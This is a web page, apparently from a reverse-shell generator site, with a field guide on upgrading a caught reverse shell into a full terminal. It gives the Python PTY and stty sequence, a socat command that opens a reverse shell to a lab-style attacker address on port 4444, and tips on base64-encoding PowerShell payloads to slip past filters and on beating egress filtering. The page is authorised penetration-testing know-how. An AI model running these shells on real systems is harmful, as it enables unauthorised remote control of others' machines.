revshell.work
For authorized testing & lab environments only.Use only on systems you own or are explicitly contracted to assess. Unauthorized access is illegal.
Field guide

From raw shell to a real terminal

A freshly caught reverse shell is brittle: no job control, no tab-completion, and one stray Ctrl-C kills the whole session. Stabilizing it turns that dumb pipe into a proper PTY you can actually work in.

Why stabilize

The initial shell runs without a controlling terminal. Interactive tools like ssh, su,sudo, and text editors expect a TTY and will either hang or refuse to run. Stabilization also restores arrow-key history and lets you background processes safely.

Linux: the PTY upgrade

The canonical sequence on a Linux target:

# 1. spawn a PTY inside the shell
python3 -c 'import pty; pty.spawn("/bin/bash")'

# 2. background it (Ctrl-Z) back to your local terminal
#    then fix the terminal modes:
stty raw -echo; fg

# 3. re-enable a sane environment in the shell
export TERM=xterm-256color
export SHELL=/bin/bash
stty rows 50 columns 200   # match your local window

No Python on the box? Try script -qc /bin/bash /dev/null, or fall back to a socat payload, which delivers a PTY without any manual upgrade.

socat: skip the dance

If socat exists on the target, you get a full terminal in one step. Start the raw listener on your box:

# attacker
socat -d -d TCP-LISTEN:4444,reuseaddr,fork FILE:`tty`,raw,echo=0

# target (from the generator)
socat TCP:10.10.14.7:4444 EXEC:'bash -li',pty,stderr,setsid,sigint,sane

Windows notes

PowerShell reverse shells already give a usable prompt, but they are not true PTYs. For interactive parity, upgrade withConPtyShell or pivot to a framework session. When a payload is filtered, reach for the Base64 toggle in the generator — it emits a ready-to-runpowershell -enc command that sidesteps quoting and many naive content filters.

When to encode

Encoding is about transport, not stealth in itself:

  • URL-encode when the payload travels through a query string, form field, or other HTTP context that would mangle spaces, quotes, and ampersands.
  • Base64 when quoting is the enemy — nested shells, log-poisoning, or constrained input boxes. The generator wraps the encoded blob so the target decodes and executes it automatically.

It connected, then died

  • Instant disconnect: the interpreter is missing or the wrong path. Re-enumerate and switch payloads.
  • Connects but no prompt: often a nc build without -e. Use the mkfifo variant.
  • Nothing at all: egress filtering. Move the listener to 443 or 80 and retry.
  • Garbled keys after stty: run reset in the remote shell, then redo stty raw -echo; fg.